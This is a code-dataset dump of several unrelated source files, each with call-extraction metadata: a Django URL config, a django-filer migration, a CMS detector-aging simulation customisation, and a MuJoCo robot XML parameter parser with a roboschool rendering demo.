45, 43, 50): 'token'}, {}), "('access_token', token)", False, 'from indico_ravem.plugin import RavemPlugin\n'), ((44, 4, 44, 67), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (), '', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((54, 15, 54, 26), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((59, 4, 59, 67), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (), '', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((85, 15, 85, 26), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((90, 4, 90, 59), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', ({(90, 29, 90, 43): '"""api_endpoint"""', (90, 45, 90, 58): 'root_endpoint'}, {}), "('api_endpoint', root_endpoint)", False, 'from indico_ravem.plugin import RavemPlugin\n'), ((91, 4, 91, 60), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (), '', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((105, 15, 105, 26), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((110, 4, 110, 50), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (), '', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((119, 26, 119, 80), 'requests.exceptions.Timeout', 'Timeout', (), '', False, 'from requests.exceptions import HTTPError, Timeout\n'), ((145, 10, 145, 68), 'indico.testing.util.extract_logs', 'extract_logs', (), '', False, 'from indico.testing.util import extract_logs\n'), ((164, 15, 164, 26), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((165, 44, 165, 82), 'requests.exceptions.HTTPError', 'HTTPError', ({(165, 54, 165, 81): '"""Well this is embarrassing"""'}, {}), "('Well this is embarrassing')", False, 'from requests.exceptions import HTTPError, Timeout\n'), ((174, 10, 174, 68), 'indico.testing.util.extract_logs', 'extract_logs', (), '', False, 'from indico.testing.util import extract_logs\n'), ((183, 20, 183, 31), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((194, 20, 194, 31), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((209, 20, 209, 31), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((210, 51, 210, 79), 'unittest.mock.MagicMock', 'MagicMock', (), '', False, 'from unittest.mock import MagicMock\n'), ((215, 11, 215, 36), 'indico_ravem.util.has_access', 'has_access', ({(215, 22, 215, 35): 'event_vc_room'}, {}), '(event_vc_room)', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((226, 20, 226, 31), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((227, 51, 227, 79), 'unittest.mock.MagicMock', 'MagicMock', (), '', False, 'from unittest.mock import MagicMock\n'), ((231, 11, 231, 36), 'indico_ravem.util.has_access', 'has_access', ({(231, 22, 231, 35): 'event_vc_room'}, {}), '(event_vc_room)', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((121, 9, 121, 31), 'pytest.raises', 'pytest.raises', ({(121, 23, 121, 30): 'Timeout'}, {}), '(Timeout)', False, 'import pytest\n'), ((122, 8, 122, 39), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', ({(122, 23, 122, 38): '"""test_endpoint"""'}, {}), "('test_endpoint')", False, 
'from indico_ravem.util import has_access, ravem_api_call\n'), ((141, 9, 141, 34), 'pytest.raises', 'pytest.raises', ({(141, 23, 141, 33): 'IndexError'}, {}), '(IndexError)', False, 'import pytest\n'), ((142, 8, 142, 64), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (), '', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((163, 18, 163, 58), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', ({(163, 43, 163, 57): '"""api_endpoint"""'}, {}), "('api_endpoint')", False, 'from indico_ravem.plugin import RavemPlugin\n'), ((170, 9, 170, 33), 'pytest.raises', 'pytest.raises', ({(170, 23, 170, 32): 'HTTPError'}, {}), '(HTTPError)', False, 'import pytest\n'), ((171, 8, 171, 64), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (), '', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((186, 15, 186, 40), 'indico_ravem.util.has_access', 'has_access', ({(186, 26, 186, 39): 'event_vc_room'}, {}), '(event_vc_room)', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((197, 15, 197, 40), 'indico_ravem.util.has_access', 'has_access', ({(197, 26, 197, 39): 'event_vc_room'}, {}), '(event_vc_room)', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((176, 24, 176, 64), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', ({(176, 49, 176, 63): '"""api_endpoint"""'}, {}), "('api_endpoint')", False, 'from indico_ravem.plugin import RavemPlugin\n')]
stormsha/StormOnline
apps/organization/urls.py
10983b7a9ee09958927731ee3fd74178d7534ff6
# _*_ coding: utf-8 _*_
# ---------------------------
__author__ = 'StormSha'
__date__ = '2018/3/28 18:01'
# ---------------------------

# -------------------------django----------------------
from django.conf.urls import url

from .views import OrgView, AddUserAskView, OrgHomeView, OrgCourseView, OrgDescView, OrgTeacherView, AddFavView
from .views import TeacherListView, TeacherDetailView

urlpatterns = [
    url(r'^list/$', OrgView.as_view(), name="org_list"),
    url(r'^add_ask/$', AddUserAskView.as_view(), name="add_ask"),
    url(r'^home/(?P<org_id>\d+)/$', OrgHomeView.as_view(), name="org_home"),
    url(r'^course/(?P<org_id>\d+)/$', OrgCourseView.as_view(), name="org_course"),
    url(r'^desc/(?P<org_id>\d+)/$', OrgDescView.as_view(), name="org_desc"),
    url(r'^org_teacher/(?P<org_id>\d+)/$', OrgTeacherView.as_view(), name="org_teacher"),

    # --------------organization favorites-------------------------
    url(r'^add_fav/$', AddFavView.as_view(), name="add_fav"),

    # -----------------------teacher------------------------------
    url(r'^teacher/list/$', TeacherListView.as_view(), name="teacher_list"),
    url(r'^teacher/detail/(?P<teacher_id>\d+)/$', TeacherDetailView.as_view(), name="teacher_detail")
]
[]
priyamshah112/Project-Descripton-Blog
tech_project/lib/python2.7/site-packages/filer/migrations/0010_auto_20180414_2058.py
8e01016c6be79776c4f5ca75563fa3daa839e39e
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    dependencies = [
        ('filer', '0009_auto_20171220_1635'),
    ]

    operations = [
        migrations.AlterField(
            model_name='image',
            name='file_ptr',
            field=models.OneToOneField(primary_key=True, serialize=False, related_name='filer_image_file', parent_link=True, to='filer.File', on_delete=django.db.models.deletion.CASCADE),
        ),
    ]
[((18, 18, 18, 186), 'django.db.models.OneToOneField', 'models.OneToOneField', (), '', False, 'from django.db import migrations, models\n')]
ckamtsikis/cmssw
SLHCUpgradeSimulations/Configuration/python/aging.py
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
import FWCore.ParameterSet.Config as cms # handle normal mixing or premixing def getHcalDigitizer(process): if hasattr(process,'mixData'): return process.mixData if hasattr(process,'mix') and hasattr(process.mix,'digitizers') and hasattr(process.mix.digitizers,'hcal'): return process.mix.digitizers.hcal return None def getHGCalDigitizer(process,section): if hasattr(process,'mix') and hasattr(process.mix,'digitizers'): if section == 'EE' and hasattr(process.mix.digitizers,'hgceeDigitizer'): return process.mix.digitizers.hgceeDigitizer elif section == 'FH' and hasattr(process.mix.digitizers,'hgchefrontDigitizer'): return process.mix.digitizers.hgchefrontDigitizer elif section == 'BH' and hasattr(process.mix.digitizers,'hgchebackDigitizer'): return process.mix.digitizers.hgchebackDigitizer elif section == 'HFNose' and hasattr(process.mix.digitizers,'hfnoseDigitizer'): return process.mix.digitizers.hfnoseDigitizer return None # change assumptions about lumi rate def setScenarioHLLHC(module,scenarioHLLHC): if scenarioHLLHC=="nominal": from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import _years_LHC, _years_HLLHC_nominal module.years = _years_LHC + _years_HLLHC_nominal elif scenarioHLLHC=="ultimate": from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import _years_LHC, _years_HLLHC_ultimate module.years = _years_LHC + _years_HLLHC_ultimate return module # turnon = True enables default, False disables # recalibration and darkening always together def ageHB(process,turnon,scenarioHLLHC): if turnon: from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import HBDarkeningEP process.HBDarkeningEP = HBDarkeningEP process.HBDarkeningEP = setScenarioHLLHC(process.HBDarkeningEP,scenarioHLLHC) hcaldigi = getHcalDigitizer(process) if hcaldigi is not None: hcaldigi.HBDarkening = cms.bool(turnon) if hasattr(process,'es_hardcode'): process.es_hardcode.HBRecalibration = cms.bool(turnon) return process def ageHE(process,turnon,scenarioHLLHC): if turnon: from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import HEDarkeningEP process.HEDarkeningEP = HEDarkeningEP process.HEDarkeningEP = setScenarioHLLHC(process.HEDarkeningEP,scenarioHLLHC) hcaldigi = getHcalDigitizer(process) if hcaldigi is not None: hcaldigi.HEDarkening = cms.bool(turnon) if hasattr(process,'es_hardcode'): process.es_hardcode.HERecalibration = cms.bool(turnon) return process def ageHF(process,turnon): hcaldigi = getHcalDigitizer(process) if hcaldigi is not None: hcaldigi.HFDarkening = cms.bool(turnon) if hasattr(process,'es_hardcode'): process.es_hardcode.HFRecalibration = cms.bool(turnon) return process def agedHFNose(process,algo=0): from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HFNose_setEndOfLifeNoise process = HFNose_setEndOfLifeNoise(process,byDose=True,byDoseAlgo=algo) return process def agedHGCal(process,algo=0): from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HGCal_setEndOfLifeNoise process = HGCal_setEndOfLifeNoise(process,byDose=True,byDoseAlgo=algo) return process def realisticHGCalStartup(process): from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HGCal_setRealisticStartupNoise process = HGCal_setRealisticStartupNoise(process) return process # needs lumi to set proper ZS thresholds (tbd) def ageSiPM(process,turnon,lumi): process.es_hardcode.hbUpgrade.doRadiationDamage = turnon process.es_hardcode.heUpgrade.doRadiationDamage = turnon # todo: determine ZS threshold adjustments # adjust PF thresholds for increased noise # based on: 
https://baylor.box.com/s/w32ja75krcbxcycyifexu28dwlgrj7wg hcal_lumis = [300, 1000, 3000, 4500, 1e10] hcal_thresholds = { 300: { "seed": [0.5, 0.625, 0.75, 0.75], "rec": [0.4, 0.5, 0.6, 0.6], }, 1000: { "seed": [1.0, 1.5, 1.5, 1.5], "rec": [0.8, 1.2, 1.2, 1.2], }, 3000: { "seed": [1.25, 2.5, 2.5, 2.5], "rec": [1.0, 2.0, 2.0, 2.0], }, 4500: { "seed": [1.5, 3.0, 3.0, 3.0], "rec": [1.25, 2.5, 2.5, 2.5], }, } ctmodules = ['calotowermaker','caloTowerForTrk','caloTowerForTrkPreSplitting','towerMaker','towerMakerWithHO'] for ilumi, hcal_lumi in enumerate(hcal_lumis[:-1]): if lumi >= hcal_lumi and lumi < hcal_lumis[ilumi+1]: if hasattr(process,'particleFlowClusterHBHE'): process.particleFlowClusterHBHE.seedFinder.thresholdsByDetector[0].seedingThreshold = hcal_thresholds[hcal_lumi]["seed"] process.particleFlowClusterHBHE.initialClusteringStep.thresholdsByDetector[0].gatheringThreshold = hcal_thresholds[hcal_lumi]["rec"] process.particleFlowClusterHBHE.pfClusterBuilder.recHitEnergyNorms[0].recHitEnergyNorm = hcal_thresholds[hcal_lumi]["rec"] process.particleFlowClusterHBHE.pfClusterBuilder.positionCalc.logWeightDenominatorByDetector[0].logWeightDenominator = hcal_thresholds[hcal_lumi]["rec"] process.particleFlowClusterHBHE.pfClusterBuilder.allCellsPositionCalc.logWeightDenominatorByDetector[0].logWeightDenominator = hcal_thresholds[hcal_lumi]["rec"] if hasattr(process,'particleFlowClusterHCAL'): process.particleFlowClusterHCAL.pfClusterBuilder.allCellsPositionCalc.logWeightDenominatorByDetector[0].logWeightDenominator = hcal_thresholds[hcal_lumi]["rec"] if hasattr(process,'particleFlowRecHitHBHE'): process.particleFlowRecHitHBHE.producers[0].qualityTests[0].cuts[0].threshold = hcal_thresholds[hcal_lumi]["rec"] for ctmod in ctmodules: if hasattr(process,ctmod): getattr(process,ctmod).HBThreshold1 = hcal_thresholds[hcal_lumi]["rec"][0] getattr(process,ctmod).HBThreshold2 = hcal_thresholds[hcal_lumi]["rec"][1] getattr(process,ctmod).HBThreshold = hcal_thresholds[hcal_lumi]["rec"][-1] break return process def ageHcal(process,lumi,instLumi,scenarioHLLHC): hcaldigi = getHcalDigitizer(process) if hcaldigi is not None: hcaldigi.DelivLuminosity = cms.double(float(lumi)) # integrated lumi in fb-1 # these lines need to be further activated by turning on 'complete' aging for HF if hasattr(process,'g4SimHits'): process.g4SimHits.HCalSD.InstLuminosity = cms.double(float(instLumi)) process.g4SimHits.HCalSD.DelivLuminosity = cms.double(float(lumi)) # recalibration and darkening always together if hasattr(process,'es_hardcode'): process.es_hardcode.iLumi = cms.double(float(lumi)) # functions to enable individual subdet aging process = ageHB(process,True,scenarioHLLHC) process = ageHE(process,True,scenarioHLLHC) process = ageHF(process,True) process = ageSiPM(process,True,lumi) return process def turn_on_HB_aging(process): process = ageHB(process,True,"") return process def turn_off_HB_aging(process): process = ageHB(process,False,"") return process def turn_on_HE_aging(process): process = ageHE(process,True,"") return process def turn_off_HE_aging(process): process = ageHE(process,False,"") return process def turn_on_HF_aging(process): process = ageHF(process,True) return process def turn_off_HF_aging(process): process = ageHF(process,False) return process def turn_off_SiPM_aging(process): process = ageSiPM(process,False,0.0) return process def hf_complete_aging(process): if hasattr(process,'g4SimHits'): process.g4SimHits.HCalSD.HFDarkening = cms.untracked.bool(True) hcaldigi = getHcalDigitizer(process) if hcaldigi 
is not None: hcaldigi.HFDarkening = cms.untracked.bool(False) return process def ageEcal(process,lumi,instLumi): if hasattr(process,'g4SimHits'): #these lines need to be further activiated by tuning on 'complete' aging for ecal process.g4SimHits.ECalSD.InstLuminosity = cms.double(instLumi) process.g4SimHits.ECalSD.DelivLuminosity = cms.double(float(lumi)) # available conditions ecal_lumis = [300,1000,3000,4500] ecal_conditions = [ ['EcalIntercalibConstantsRcd','EcalIntercalibConstants_TL{:d}_upgrade_8deg_v2_mc'], ['EcalIntercalibConstantsMCRcd','EcalIntercalibConstantsMC_TL{:d}_upgrade_8deg_v2_mc'], ['EcalLaserAPDPNRatiosRcd','EcalLaserAPDPNRatios_TL{:d}_upgrade_8deg_mc'], ['EcalPedestalsRcd','EcalPedestals_TL{:d}_upgradeTIA_8deg_mc'], ['EcalTPGLinearizationConstRcd','EcalTPGLinearizationConst_TL{:d}_upgrade_8deg_mc'], ] # update PF thresholds, based on https://indico.cern.ch/event/653123/contributions/2659235/attachments/1491385/2318364/170711_upsg_ledovskoy.pdf ecal_thresholds = { 300 : 0.103, 1000 : 0.175, 3000 : 0.435, 4500 : 0.707, } ecal_seed_multiplier = 2.5 # try to get conditions if int(lumi) in ecal_lumis: if not hasattr(process.GlobalTag,'toGet'): process.GlobalTag.toGet=cms.VPSet() for ecal_condition in ecal_conditions: process.GlobalTag.toGet.append(cms.PSet( record = cms.string(ecal_condition[0]), tag = cms.string(ecal_condition[1].format(int(lumi))), connect = cms.string("frontier://FrontierProd/CMS_CONDITIONS") ) ) if hasattr(process,"particleFlowClusterECALUncorrected"): _seeds = process.particleFlowClusterECALUncorrected.seedFinder.thresholdsByDetector for iseed in range(0,len(_seeds)): if _seeds[iseed].detector.value()=="ECAL_BARREL": _seeds[iseed].seedingThreshold = cms.double(ecal_thresholds[int(lumi)]*ecal_seed_multiplier) _clusters = process.particleFlowClusterECALUncorrected.initialClusteringStep.thresholdsByDetector for icluster in range(0,len(_clusters)): if _clusters[icluster].detector.value()=="ECAL_BARREL": _clusters[icluster].gatheringThreshold = cms.double(ecal_thresholds[int(lumi)]) return process def ecal_complete_aging(process): if hasattr(process,'g4SimHits'): process.g4SimHits.ECalSD.AgeingWithSlopeLY = cms.untracked.bool(True) if hasattr(process,'ecal_digi_parameters'): process.ecal_digi_parameters.UseLCcorrection = cms.untracked.bool(False) return process def customise_aging_300(process): process=ageHcal(process,300,5.0e34,"nominal") process=ageEcal(process,300,5.0e34) return process def customise_aging_1000(process): process=ageHcal(process,1000,5.0e34,"nominal") process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration process=ageEcal(process,1000,5.0e34) return process def customise_aging_3000(process): process=ageHcal(process,3000,5.0e34,"nominal") process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration process=ageEcal(process,3000,5.0e34) process=agedHGCal(process) process=agedHFNose(process) return process def customise_aging_3000_ultimate(process): process=ageHcal(process,3000,7.5e34,"ultimate") process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration process=ageEcal(process,3000,7.5e34) process=agedHGCal(process) process=agedHFNose(process) return process def customise_aging_4500_ultimate(process): process=ageHcal(process,4500,7.5e34,"ultimate") process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration process=ageEcal(process,4500,7.5e34) process=agedHGCal(process) 
process=agedHFNose(process) return process
[((66, 14, 66, 75), 'SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi.HFNose_setEndOfLifeNoise', 'HFNose_setEndOfLifeNoise', (), '', False, 'from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HFNose_setEndOfLifeNoise\n'), ((71, 14, 71, 74), 'SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi.HGCal_setEndOfLifeNoise', 'HGCal_setEndOfLifeNoise', (), '', False, 'from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HGCal_setEndOfLifeNoise\n'), ((76, 14, 76, 53), 'SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi.HGCal_setRealisticStartupNoise', 'HGCal_setRealisticStartupNoise', ({(76, 45, 76, 52): 'process'}, {}), '(process)', False, 'from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HGCal_setRealisticStartupNoise\n'), ((41, 52, 41, 68), 'FWCore.ParameterSet.Config.bool', 'cms.bool', ({(41, 61, 41, 67): 'turnon'}, {}), '(turnon)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((43, 46, 43, 62), 'FWCore.ParameterSet.Config.bool', 'cms.bool', ({(43, 55, 43, 61): 'turnon'}, {}), '(turnon)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((52, 52, 52, 68), 'FWCore.ParameterSet.Config.bool', 'cms.bool', ({(52, 61, 52, 67): 'turnon'}, {}), '(turnon)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((54, 46, 54, 62), 'FWCore.ParameterSet.Config.bool', 'cms.bool', ({(54, 55, 54, 61): 'turnon'}, {}), '(turnon)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((59, 52, 59, 68), 'FWCore.ParameterSet.Config.bool', 'cms.bool', ({(59, 61, 59, 67): 'turnon'}, {}), '(turnon)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((61, 46, 61, 62), 'FWCore.ParameterSet.Config.bool', 'cms.bool', ({(61, 55, 61, 61): 'turnon'}, {}), '(turnon)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((180, 47, 180, 71), 'FWCore.ParameterSet.Config.untracked.bool', 'cms.untracked.bool', ({(180, 66, 180, 70): 'True'}, {}), '(True)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((182, 52, 182, 77), 'FWCore.ParameterSet.Config.untracked.bool', 'cms.untracked.bool', ({(182, 71, 182, 76): 'False'}, {}), '(False)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((188, 50, 188, 70), 'FWCore.ParameterSet.Config.double', 'cms.double', ({(188, 61, 188, 69): 'instLumi'}, {}), '(instLumi)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((235, 53, 235, 77), 'FWCore.ParameterSet.Config.untracked.bool', 'cms.untracked.bool', ({(235, 72, 235, 76): 'True'}, {}), '(True)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((237, 55, 237, 80), 'FWCore.ParameterSet.Config.untracked.bool', 'cms.untracked.bool', ({(237, 74, 237, 79): 'False'}, {}), '(False)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((213, 36, 213, 47), 'FWCore.ParameterSet.Config.VPSet', 'cms.VPSet', ({}, {}), '()', True, 'import FWCore.ParameterSet.Config as cms\n'), ((216, 25, 216, 54), 'FWCore.ParameterSet.Config.string', 'cms.string', ({(216, 36, 216, 53): 'ecal_condition[0]'}, {}), '(ecal_condition[0])', True, 'import FWCore.ParameterSet.Config as cms\n'), ((218, 26, 218, 78), 'FWCore.ParameterSet.Config.string', 'cms.string', ({(218, 37, 218, 77): '"""frontier://FrontierProd/CMS_CONDITIONS"""'}, {}), "('frontier://FrontierProd/CMS_CONDITIONS')", True, 'import FWCore.ParameterSet.Config as cms\n')]
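The HCAL part of the aging customisation above picks seed and rec-hit thresholds by integrated-luminosity bin (300, 1000, 3000, 4500 fb^-1, with 1e10 as an open upper edge). A minimal standalone sketch of that lookup, plain Python and not part of the catalogued file; the thresholds_for helper name is made up for illustration:

hcal_lumis = [300, 1000, 3000, 4500, 1e10]  # last entry acts as an open upper bound
hcal_thresholds = {
    300:  {"seed": [0.5, 0.625, 0.75, 0.75], "rec": [0.4, 0.5, 0.6, 0.6]},
    1000: {"seed": [1.0, 1.5, 1.5, 1.5],     "rec": [0.8, 1.2, 1.2, 1.2]},
    3000: {"seed": [1.25, 2.5, 2.5, 2.5],    "rec": [1.0, 2.0, 2.0, 2.0]},
    4500: {"seed": [1.5, 3.0, 3.0, 3.0],     "rec": [1.25, 2.5, 2.5, 2.5]},
}

def thresholds_for(lumi):
    """Return the threshold set whose bin contains lumi, mirroring the loop above."""
    for ilumi, edge in enumerate(hcal_lumis[:-1]):
        if edge <= lumi < hcal_lumis[ilumi + 1]:
            return hcal_thresholds[edge]
    return None

print(thresholds_for(450)["rec"])   # [0.4, 0.5, 0.6, 0.6] -> the 300 fb^-1 scenario

In the customisation itself the selected values are then written into particleFlowClusterHBHE, particleFlowRecHitHBHE and the calotower makers, as recorded in the file content above.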
cbschaff/nlimb
xml_parser.py
f0564b00bab1b3367aaa88163e49bebc88f349bb
import numpy as np import xml.etree.ElementTree as ET class Geom(object): def __init__(self, geom): self.xml = geom self.params = [] def get_params(self): return self.params.copy() def set_params(self, new_params): self.params = new_params def update_point(self, p, new_params): pass def update_xml(self): pass def update(self, new_params): self.set_params(new_params) self.update_xml() def get_smallest_z(self): pass def get_param_limits(self): pass def get_param_names(self): pass def get_volume(self): pass class Sphere(Geom): min_radius = .05 max_radius = .4 def __init__(self, geom): self.xml = geom self.params = [float(self.xml.get('size'))] # radius self.center = np.array([float(x) for x in self.xml.get('pos').split()]) def update_point(self, p, new_params): return ((p - self.center) * new_params[0] / self.params[0]) + self.center def update_xml(self): self.xml.set('size', str(self.params[0])) def get_smallest_z(self): return self.center[2] - self.params[0] def get_param_limits(self): return [[self.min_radius], [self.max_radius]] def get_param_names(self): return ['radius'] def get_volume(self): return 4./3. * np.pi * self.params[0] ** 3 class Capsule(Geom): min_length = 0.175 max_length = 0.8 min_radius = 0.035 max_radius = 0.085 def __init__(self, geom): self.xml = geom fromto = [float(x) for x in self.xml.get('fromto').split()] self.p1 = np.array(fromto[:3]) self.p2 = np.array(fromto[3:]) length = np.sqrt(np.sum((self.p2 - self.p1) ** 2)) radius = float(self.xml.get('size')) self.params = [length, radius] self.axis = (self.p2 - self.p1) / length def update_point(self, p, new_params): lfac = p.dot(self.axis) * self.axis rfac = p - lfac return p + lfac * (-1.0 + new_params[0] / self.params[0])# + rfac * (new_params[1] / self.params[1]) def update_xml(self): self.xml.set('fromto', ' '.join([str(x) for x in np.concatenate([self.p1, self.p2])])) self.xml.set('size', str(self.params[1])) # radius def set_params(self, new_params): p1 = self.update_point(self.p1, new_params) p2 = self.update_point(self.p2, new_params) # update only after computing p1, p2 self.p1 = p1 self.p2 = p2 super().set_params(new_params) def get_smallest_z(self): return min(self.p1[2], self.p2[2]) - self.params[1] def get_param_limits(self): return [[self.min_length, self.min_radius], [self.max_length, self.max_radius]] def get_param_names(self): return ['length','radius'] def get_volume(self): return 4./3. 
* np.pi * self.params[1]**3 + self.params[0] * np.pi * self.params[1]**2 class Body: geoms = {'sphere': Sphere, 'capsule': Capsule} # dictionary of legal geometry types def __init__(self, body, worldbody=False): self.xml = body self.worldbody = worldbody geom_xml = body.find('geom') # assume only one geometry per body self.geom = self.geoms[geom_xml.get('type')](geom_xml) self.joints = [j for j in body.findall('joint') if 'ignore' not in j.get('name')] self.parts = [Body(b) for b in body.findall('body')] pos = [b.get('pos') for b in body.findall('body')] self.part_positions = [np.array([float(x) for x in p.split()]) for p in pos] pos = [j.get('pos') for j in self.joints] self.joint_positions = [np.array([float(x) for x in p.split()]) for p in pos] self.n = len(self.geom.get_params()) self.n_all_params = len(self.get_params()) self.zmin = float(self.xml.get("pos").split()[2]) - self.get_height() def get_height(self): max_height = -self.geom.get_smallest_z() for body, pos in zip(self.parts, self.part_positions): max_height = max(max_height, body.get_height() - pos[2]) return max_height def update_initial_position(self): pos = self.xml.get("pos").split() pos[2] = str(self.get_height() + self.zmin) self.xml.set("pos", ' '.join(pos)) def update_xml(self): for body, pos in zip(self.parts, self.part_positions): body.xml.set('pos', ' '.join([str(x) for x in pos])) for joint, pos in zip(self.joints, self.joint_positions): joint.set('pos', ' '.join([str(x) for x in pos])) def set_body_positions(self, new_params): for i, pos in enumerate(self.part_positions): self.part_positions[i] = self.geom.update_point(pos, new_params) for i, pos in enumerate(self.joint_positions): self.joint_positions[i] = self.geom.update_point(pos, new_params) def update(self, new_params): self.set_body_positions(new_params) self.geom.update(new_params) self.update_xml() def get_params(self): params = self.geom.get_params() for body in self.parts: params += body.get_params() return params def get_param_limits(self): limits = self.geom.get_param_limits() for body in self.parts: body_limits = body.get_param_limits() limits[0] += body_limits[0] limits[1] += body_limits[1] return limits def get_param_names(self): name = self.xml.get('name') param_names = [name + '-' + p for p in self.geom.get_param_names()] for body in self.parts: param_names += body.get_param_names() return param_names def update_params(self, new_params): if self.worldbody: assert len(new_params) == self.n_all_params, "Wrong number of parameters" self.update(new_params[:self.n]) remaining_params = new_params[self.n:] for body in self.parts: remaining_params = body.update_params(remaining_params) if self.worldbody: self.update_initial_position() else: return remaining_params def get_body_names(self): names = [self.xml.get('name')] for body in self.parts: names += body.get_names() return names def get_joints(self): joints = {} for body,pos in zip(self.parts, self.part_positions): for j in body.joints: joints[j.get('name')] = (self.xml.get('name'), body.xml.get('name'), self.geom, body.geom, pos) joints.update(body.get_joints()) return joints def get_volumes(self): volumes = {} if len(self.joints) > 0: for j in self.joints: v1 = self.geom.get_volume() v2 = sum([b.geom.get_volume() for b in self.parts]) volumes[j.get('name')] = np.array((v1, v2)) for body in self.parts: volumes.update(body.get_volumes()) return volumes class MuJoCoXmlRobot: def __init__(self, model_xml): self.model_xml = model_xml self.tree = ET.parse(self.model_xml) worldbody = 
self.tree.getroot().find('worldbody') self.body = Body(worldbody.find('body'), worldbody=True) def get_params(self): return self.body.get_params() def get_param_limits(self): return self.body.get_param_limits() def get_param_names(self): return self.body.get_param_names() def get_height(self): return self.body.get_height() def get_joints(self): return self.body.get_joints() def get_volumes(self): return self.body.get_volumes() def update(self, params, xml_file=None): if xml_file is None: xml_file = self.model_xml self.body.update_params(list(params)) self.tree.write(xml_file) if __name__ == '__main__': robot = MuJoCoXmlRobot('mujoco_assets/hopper.xml') params = list(1.0 * np.array(robot.get_params())) robot.update(params, 'mujoco_assets/hopper_test.xml') assert robot.get_params() == params #assert robot.get_height() == 1.31 print(robot.get_param_limits()) print(robot.get_param_names()) robot = MuJoCoXmlRobot('mujoco_assets/walker2d.xml') params = [.4,.04,.5,.05,.55,.055,.6,.06,.5,.05,.55,.055,.6,.06] robot.update(params, 'mujoco_assets/walker2d_test.xml') assert robot.get_params() == params assert robot.get_height() == 1.31 print(robot.get_param_limits()) print(robot.get_param_names()) robot = MuJoCoXmlRobot('mujoco_assets/ant.xml') params = [.2, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06] robot.update(params, 'mujoco_assets/ant_test.xml') assert robot.get_params() == params assert robot.get_height() == .2 print(robot.get_param_limits()) print(robot.get_param_names()) robot = MuJoCoXmlRobot('mujoco_assets/humanoid.xml') params = list(.8 * np.array(robot.get_params())) robot.update(params, 'mujoco_assets/humanoid_test.xml') assert robot.get_params() == params print(robot.get_height()) #assert robot.get_height() == .6085 print(robot.get_param_limits()) print(robot.get_param_names()) import gym, roboschool env = gym.make("RoboschoolHopper-v1") env.unwrapped.model_xml = 'mujoco_assets/hopper_test.xml' env.reset() #env.render() import os from scipy.misc import imsave import subprocess as sp outdir = 'xml_vid' os.makedirs(outdir, exist_ok=True) i = 0 for _ in range(10): env.reset() for _ in range(100): env.step(env.action_space.sample()) rgb = env.render('rgb_array') imsave(os.path.join(outdir, '{:05d}.png'.format(i)), rgb) i+=1 sp.call(['ffmpeg', '-r', '60', '-f', 'image2', '-i', os.path.join(outdir, '%05d.png'), '-vcodec', 'libx264', '-pix_fmt', 'yuv420p', os.path.join(outdir, 'out.mp4')]) 